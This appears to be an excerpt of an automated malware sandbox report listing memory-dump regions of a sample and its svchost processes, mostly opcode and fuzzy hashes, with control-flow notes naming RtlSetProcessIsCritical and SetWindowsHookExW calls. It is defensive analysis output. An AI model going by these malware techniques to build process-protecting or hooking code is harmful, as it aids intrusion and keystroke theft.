                                                  • Instruction ID: 144aa40177624009f6ec66ecd65402f74926dc148d5b255ccd520ed68c25464e
                                                  • Opcode Fuzzy Hash: a6a3b732ba7bf305f0fc1f053bc3b53d28f659eb2b9113bfa448bd35a5c1ed3a
                                                  • Instruction Fuzzy Hash: 26E1C530A09A4E8FEBA8DF28C8657E977E1FF58310F04426EE84DC7295DE7499418BC1

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146297658.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_WV7Gj9lJ7W.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5661e4ebee25088655144d320226359cb8b61ebc13b8fde13fcc24f7aa4e6756
                                                  • Instruction ID: c84cc7c42140d46f2858030b15f081172e5d4e11600c561d16a1d85062fcb453
                                                  • Opcode Fuzzy Hash: 5661e4ebee25088655144d320226359cb8b61ebc13b8fde13fcc24f7aa4e6756
                                                  • Instruction Fuzzy Hash: BAC1C320B1D95D4FEB98EBBC94756B97BD2EF9C300F050579E05DC32E6DE28A9024B81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146297658.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_WV7Gj9lJ7W.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 178008a426a93917e5dfcfc9385e01b8606b46a89f48d0b2bcfba2c47517dc69
                                                  • Instruction ID: 27585600fc17224b8616496a263ed9bb75a5cfe6290b28f599fcc319fabd77d4
                                                  • Opcode Fuzzy Hash: 178008a426a93917e5dfcfc9385e01b8606b46a89f48d0b2bcfba2c47517dc69
                                                  • Instruction Fuzzy Hash: A951FF11B0E6C90FD796ABB85835675BFE0DF9B219B0800FBE099C71E7DD081806C382

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 283 7ffd9b8b97ad-7ffd9b8b9890 RtlSetProcessIsCritical 287 7ffd9b8b9898-7ffd9b8b98cd 283->287 288 7ffd9b8b9892 283->288 288->287
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146297658.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_WV7Gj9lJ7W.jbxd
                                                  Similarity
                                                  • API ID: CriticalProcess
                                                  • String ID:
                                                  • API String ID: 2695349919-0
                                                  • Opcode ID: a3874d571839e4d56ff6839a0350e6dfee1ca8854a0a78ac3f5e230f87dc7827
                                                  • Instruction ID: a1f1202517d4263ff0b02294a84e7802302e51a61216bd2b05d6769c04c4fca1
                                                  • Opcode Fuzzy Hash: a3874d571839e4d56ff6839a0350e6dfee1ca8854a0a78ac3f5e230f87dc7827
                                                  • Instruction Fuzzy Hash: F541043190C6598FDB19DFA8D855BE97BF0FF56310F04416ED08AC3692CB346846CB91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 290 7ffd9b8b9f68-7ffd9b8b9f6f 291 7ffd9b8b9f7a-7ffd9b8b9fed 290->291 292 7ffd9b8b9f71-7ffd9b8b9f79 290->292 296 7ffd9b8ba079-7ffd9b8ba07d 291->296 297 7ffd9b8b9ff3-7ffd9b8b9ff8 291->297 292->291 298 7ffd9b8ba002-7ffd9b8ba03f SetWindowsHookExW 296->298 299 7ffd9b8b9fff-7ffd9b8ba000 297->299 300 7ffd9b8ba047-7ffd9b8ba078 298->300 301 7ffd9b8ba041 298->301 299->298 301->300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146297658.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_WV7Gj9lJ7W.jbxd
                                                  Similarity
                                                  • API ID: HookWindows
                                                  • String ID:
                                                  • API String ID: 2559412058-0
                                                  • Opcode ID: 0017aed796659ea2126ae7774436c0a4a0754a05326038b24b4041b57850018b
                                                  • Instruction ID: bb44f184603da9c8eac47790bff5ea28c87c16079486c48c8bda253a56692ce8
                                                  • Opcode Fuzzy Hash: 0017aed796659ea2126ae7774436c0a4a0754a05326038b24b4041b57850018b
                                                  • Instruction Fuzzy Hash: 2741E731A1CA5D8FDB58DB6C98566F97BE1EB59321F00427ED049C3292DE74A812CBC1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1795322412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2a36091bba8e423a9381086a3a466a6ba656a9a8b227c3da6eeb988af5e103cb
                                                  • Instruction ID: 037baccb8846aa88e3df8518535986e951c9a00b76841c40436778ff40fa903e
                                                  • Opcode Fuzzy Hash: 2a36091bba8e423a9381086a3a466a6ba656a9a8b227c3da6eeb988af5e103cb
                                                  • Instruction Fuzzy Hash: 3D52A461B29E494FE7A8FB6894756BDB6D2EF9C300F4405BDE05EC32D6DE38A8418341
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1795322412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1229d5eccd5523dac140433f60635ebdb656a4c8426fb926b8eaa2a2063e6126
                                                  • Instruction ID: 152b0a11e882f34c17a05b3ee4f47cc5bf9f7b3c4c1ee218c9e604ba79fb58bc
                                                  • Opcode Fuzzy Hash: 1229d5eccd5523dac140433f60635ebdb656a4c8426fb926b8eaa2a2063e6126
                                                  • Instruction Fuzzy Hash: 84510110B0E6C90FD796ABB85875665AFE0DF9B219B1800FBE099C71E7DE181806C342
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1795322412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :O_^$k:O
                                                  • API String ID: 0-93555433
                                                  • Instruction ID: 2be538587846df8c23b3e03620767413518c6e43bb0a395f49c20bc7292c9988
                                                  • Opcode Fuzzy Hash: 9c940db3ff7a9f5a09ac9241a9fbaf5c19709d06ebf5fc446a27751d51d34d52
                                                  • Instruction Fuzzy Hash: EB717A26B1896A8AD70ABB7CBC659ED7BA1EF86324B4845B7C008CB1D7CD246447C7C1
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db206975792ea132c57f83f0b24a7e5609200afa31a11fd94b5f1056d4fbd7ad
                                                  • Instruction ID: 1158b68270e28ca2ab31c41e2253220cd5350d453e4f4774093e17c849f439b7
                                                  • Opcode Fuzzy Hash: db206975792ea132c57f83f0b24a7e5609200afa31a11fd94b5f1056d4fbd7ad
                                                  • Instruction Fuzzy Hash: B8817F62B1E9994FD309EB7C68754E97F60FF4530478840FBD0888B2EBDD246906CB81
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aec0f1392dee7a29e57f0dcc65a7e9e6b15f9bbfbb6c2ffe6e5b366a2b5500b7
                                                  • Instruction ID: 9c693294cb6dba7482c9c7a403244e97b5d097d860c9b3e537568943a83c746d
                                                  • Opcode Fuzzy Hash: aec0f1392dee7a29e57f0dcc65a7e9e6b15f9bbfbb6c2ffe6e5b366a2b5500b7
                                                  • Instruction Fuzzy Hash: 24515721B0E69A0FE35AAB7C58369B53BD1DF86224B0940FBD08CC72EBDC0C58478752
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9bf119ba2ddb5fe881657c3f8f8a37f6df770eb92913e20469486785cb4b923e
                                                  • Instruction ID: 7a76357e05e3855ed1c1b1f78482b5e497a3ff26404c2e6d6f2b0f1c9f20c5dc
                                                  • Opcode Fuzzy Hash: 9bf119ba2ddb5fe881657c3f8f8a37f6df770eb92913e20469486785cb4b923e
                                                  • Instruction Fuzzy Hash: E4410621B19A5E4FEB49FBBC9865AED7BA1FF89300F844576D008C72C7CD24A446C791
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4dcf347052991d407725e81a3f1f4364e1717927752dddc4d5dfe70c8a21d3ae
                                                  • Instruction ID: 2dbcf1c10ed41471571010fb94b226c0a08ffe572de4762730001d991e53c3d3
                                                  • Opcode Fuzzy Hash: 4dcf347052991d407725e81a3f1f4364e1717927752dddc4d5dfe70c8a21d3ae
                                                  • Instruction Fuzzy Hash: A931D621B1C9480FE798EF6C586A679A7C2EF9D315F0401BAE00EC32EBDD18AC418741
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bb56a706f181337e04144df5daaa0331acd9fd5a08ebf9a0372fe13d4d76275d
                                                  • Instruction ID: 84ed47f7e6a5dfff917c67434034cc3668c8211430212dbefee4a84cc2ce4442
                                                  • Opcode Fuzzy Hash: bb56a706f181337e04144df5daaa0331acd9fd5a08ebf9a0372fe13d4d76275d
                                                  • Instruction Fuzzy Hash: 55210752B1DA594FE759B7BC5C3A7B837D1EF98740F0402BAE00CC31D6EE1869428782
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d042ec6ddb2711ec65649d92f71e6fa040bdb0a86289761ded9d2969707c4925
                                                  • Instruction ID: 39bc9f95e37961edd51524f393e839e9a6c458690f3b7ed35b2dc71f5336347c
                                                  • Opcode Fuzzy Hash: d042ec6ddb2711ec65649d92f71e6fa040bdb0a86289761ded9d2969707c4925
                                                  • Instruction Fuzzy Hash: 1F317E65758A4A4FD348FB28A4BA9A9BF72FF88300BC484B5D419C73CEDD346942C752
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed921e3dccc8615ad4d8e0806d054525a37a787479d965a3f7294af325b0e25f
                                                  • Instruction ID: 9f7cd512e2d4146b3e3a4ecf36d8eaf0cdd69c78f1bd0dd2b6a6c12bcde48887
                                                  • Opcode Fuzzy Hash: ed921e3dccc8615ad4d8e0806d054525a37a787479d965a3f7294af325b0e25f
                                                  • Instruction Fuzzy Hash: D8017015A0E6A50FE755AB7C6C718757FE0DF9921070905BBE488C71E7D808664187C2
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4d0598652a4655a2c1ac09468ab4351308726f62b176886f69071661fd946fd6
                                                  • Instruction ID: 08c63b5c605943213cd53b8e428da500bde8beaddc7a743e666a5662f2767bd8
                                                  • Opcode Fuzzy Hash: 4d0598652a4655a2c1ac09468ab4351308726f62b176886f69071661fd946fd6
                                                  • Instruction Fuzzy Hash: B5E06D21B1491D4FEF44BBACA8556FCB2D2EB8C616F100177D51DD329ADE2898028381
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d699d868665172c55e3b73ebe6ce0935cb0226502886f0435dd81805c9274867
                                                  • Instruction ID: 7f19b38fe0c47d7158d2711bbca7762459d5ea92b2c52cdf0077dc354d4a35c0
                                                  • Opcode Fuzzy Hash: d699d868665172c55e3b73ebe6ce0935cb0226502886f0435dd81805c9274867
                                                  • Instruction Fuzzy Hash: 7152B761F29A4D4FE768FB7898756B9B6D2FF9C700F4405B9E04EC32D6DE28A8018341
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4a4aff629d3d025dbf7d80d81affff88a0266fdc345bba3951a804fb5757238f
                                                  • Instruction ID: 1aad4a02003e2454e3ced6f72f04aaf8f8005b4f42869100f10ee71eec2e7298
                                                  • Opcode Fuzzy Hash: 4a4aff629d3d025dbf7d80d81affff88a0266fdc345bba3951a804fb5757238f
                                                  • Instruction Fuzzy Hash: EF51FF10B0E6C90FD7A6ABB85835675BFE0DF9B219B0801FBE099C71E7DD081806C352
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :M_^$k:M
                                                  • API String ID: 0-4016585720
                                                  • Opcode ID: 7f384c46407f87ab70c4cb98aa26fca2e5f1f7c0fdb9c37e58a745140368e15d
                                                  • Instruction ID: 002624ae95b24f00070e4224984cc128ce93d50c3f3842865c8409bf0b040c84
                                                  • Opcode Fuzzy Hash: 7f384c46407f87ab70c4cb98aa26fca2e5f1f7c0fdb9c37e58a745140368e15d
                                                  • Instruction Fuzzy Hash: 1801A75B7095A989D3077BADB8554ECBB90DE86339B0843F3D2C98D0839914508797C5
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 45ac22753057626c22a731b94effe56541927379bbae7f0cd77e201da3023663
                                                  • Instruction ID: 9a2fbb1d445897bff703a018f23f67c181ee0f13246993ab9f37dfd92a22868b
                                                  • Opcode Fuzzy Hash: 45ac22753057626c22a731b94effe56541927379bbae7f0cd77e201da3023663
                                                  • Instruction Fuzzy Hash: 9241E462F0A64E4FD755FBACE8750EC7BB1EF4A210B4402B7C059D71E2ED282802C350
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 422342f545bb6fa770786bcd213ecec8dd66db981d5e21a5bd566670e06f6ba2
                                                  • Instruction ID: 1b942fa5ee171873e8579c65598d7a8563b345779fa4baa9cbc9e93a7ad423b3
                                                  • Opcode Fuzzy Hash: 422342f545bb6fa770786bcd213ecec8dd66db981d5e21a5bd566670e06f6ba2
                                                  • Instruction Fuzzy Hash: 9B716826B1996E8AD709BB7CBC256ED7BA0EF85324B4442B7D00DCB1C7DD24644683D0
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e245f9c3f530ffb8efe19ed57d77157155d34942017d027fc4a0bfc6d43e6a70
                                                  • Instruction ID: 0940f870d55b9914233d07a66d7061904f2bc69c02174768cf0336a604369507
                                                  • Opcode Fuzzy Hash: e245f9c3f530ffb8efe19ed57d77157155d34942017d027fc4a0bfc6d43e6a70
                                                  • Instruction Fuzzy Hash: 1B816862B0F9894FD319AB6C68754E8BF60EF4570474840FBD09D876DBED38A902C782
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4255ebc052679ccfad6237d3ddad8fb67a80800062aea27d0b5111b1b36cf9d1
                                                  • Instruction ID: f15a490bc78117bc7a844b00e568749d6f61cb4920f15f58d762096df0b5747d
                                                  • Opcode Fuzzy Hash: 4255ebc052679ccfad6237d3ddad8fb67a80800062aea27d0b5111b1b36cf9d1
                                                  • Instruction Fuzzy Hash: 8E512621B1E6CA0FE35AA77C5866AB57BD1DF8622470940FBD49DC71EBDC0C58438352
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de06ed84acfcec93d4bdaa7a9be35027e8a9e9b78c93452e9d26ab49aa758479
                                                  • Instruction ID: 81dd880c9c9ba983e97c13f20fb0900a8cdfffccee0ea40e3e4be977ab320ac6
                                                  • Opcode Fuzzy Hash: de06ed84acfcec93d4bdaa7a9be35027e8a9e9b78c93452e9d26ab49aa758479
                                                  • Instruction Fuzzy Hash: 6B413625B19A5D9FEB48FBAC98616EC7BE1FF88300F4445B6D009C72C7DE24A542C791
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3d5eb824945b98e79ce251a28e81f712989309c5d7114df87c5b6002c901c1b7
                                                  • Instruction ID: c7f937d0c0b018b0cdf16f33e368551c5439c403d8bf62a826bf0ef1615a1c0b
                                                  • Opcode Fuzzy Hash: 3d5eb824945b98e79ce251a28e81f712989309c5d7114df87c5b6002c901c1b7
                                                  • Instruction Fuzzy Hash: 4131D621B1C94C0FE798EB6C586A679A7C2EF9D315F0405BAE01EC32EBDD58AC418341
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 39d8834b6f45c188957eaf5e477921206e2725c3f7f5111ae5d71cd66e37c10a
                                                  • Instruction ID: 73f409b1edb0e2a466ea2b8c30110559b8874984d12259c42338263cf9d35d62
                                                  • Opcode Fuzzy Hash: 39d8834b6f45c188957eaf5e477921206e2725c3f7f5111ae5d71cd66e37c10a
                                                  • Instruction Fuzzy Hash: 4B21E152B19A494FE759A7B85C2A6B877D2EF98740F0403BAE00CC31D6EE1868428352
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 73608d9baa2e452013353a7da419e2ea1c635fdd60c5668aacdf52589c7a23c3
                                                  • Instruction ID: e7422bd7fe5b272bb44246fd1f7f387cd57403971e02d04c3c411fee4ac4af61
                                                  • Opcode Fuzzy Hash: 73608d9baa2e452013353a7da419e2ea1c635fdd60c5668aacdf52589c7a23c3
                                                  • Instruction Fuzzy Hash: 0D319320B5A94D5FD35CEB2CA4B59A9BF71FF98200BC445A5D41AC33CAEE34A901C782
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c1a06c98866065c0807cbf3400b3e9d6f5d84b074ba8915c3b31ade667a93670
                                                  • Instruction ID: df0925c1b9cd7e74510bb7bef2f63dcfe9b30f0498666194f39d162f62bd2a12
                                                  • Opcode Fuzzy Hash: c1a06c98866065c0807cbf3400b3e9d6f5d84b074ba8915c3b31ade667a93670
                                                  • Instruction Fuzzy Hash: CD017B14A0FB990FE365AB7858718357FF0DF99210B0905BBE8C8C71E7E908AA418392
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2345733344.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6612891d5c1cb9611464f8079bb196cede8a8c0772d68f84c113412ab0e064bd
                                                  • Instruction ID: d4a1be4dbb91d95f671ba3bb4479e002fd0361fa0f5342f78bc72855bd9b8427
                                                  • Opcode Fuzzy Hash: 6612891d5c1cb9611464f8079bb196cede8a8c0772d68f84c113412ab0e064bd
                                                  • Instruction Fuzzy Hash: B7E06D21B1490D4FEF44BBACA8557FCB2D2EB8C616F1002B7D51DC329ADE2858028391
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 75118c7e8307a311198196d698784aaac9929b731c5732e9c340b4261f7800a2
                                                  • Instruction ID: 70ac4395c94ff26b4231448ada4a8f288030e576dd05776a8464dfd6ff7d1176
                                                  • Opcode Fuzzy Hash: 75118c7e8307a311198196d698784aaac9929b731c5732e9c340b4261f7800a2
                                                  • Instruction Fuzzy Hash: EA52B761F29A4D4FEB58FB7894796B9B7D2FF98300F4405B9E05EC32D6DE28A8418341
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e27d2e58240925144f319833d703014f35bd958de3e7566cccfe0b598e273609
                                                  • Instruction ID: 0450485bbe9b476e5765f011e92cae8e853b81e882f8cf2a69ec9eb0fb89d434
                                                  • Opcode Fuzzy Hash: e27d2e58240925144f319833d703014f35bd958de3e7566cccfe0b598e273609
                                                  • Instruction Fuzzy Hash: 1551FF10B1E6C90FDB9AABB85C75675AFE4DF9B219B1800FBE099C71E7DD085806C342
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :N_^$k:N
                                                  • API String ID: 0-2639712577
                                                  • Opcode ID: d8ca2889e8383d71e8b687f87b7406e42c4a9a6c2a65eb1c8b64b90c7ecea697
                                                  • Instruction ID: a59a2332e6006ff3984178844b5b24263c72030cc69cb5ee4989a7f66ad8dd52
                                                  • Opcode Fuzzy Hash: d8ca2889e8383d71e8b687f87b7406e42c4a9a6c2a65eb1c8b64b90c7ecea697
                                                  • Instruction Fuzzy Hash: 9401F21BB086B18AD30777ADB8A45ECEB90CE8537AB0801B3C3C98E083941494C783C1
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 34826285b6e34d6bc960ad48eac826ab67a90dfa03ed722585ea2f3a7231140e
                                                  • Instruction ID: 9ae26fd20f3126ddb8cfe8cc5841a53caf8388c1c7ee6d6427451e966f25aaf5
                                                  • Opcode Fuzzy Hash: 34826285b6e34d6bc960ad48eac826ab67a90dfa03ed722585ea2f3a7231140e
                                                  • Instruction Fuzzy Hash: 6041E532F0E65A5FDB55E7ACE8B51EC7FB1EF89250B4501B7D04ADB1A3ED2829068340
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2944260432.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_7ffd9b890000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 54f84a82896707a90570d8e3d23890636bce25e75ebffd263e179067afa69a93
                                                  • Instruction ID: 7373c7b0de0b9fa29855b3d09c5cf65b402ede3e099a750a88925ceafa18f941
                                                  • Opcode Fuzzy Hash: 54f84a82896707a90570d8e3d23890636bce25e75ebffd263e179067afa69a93
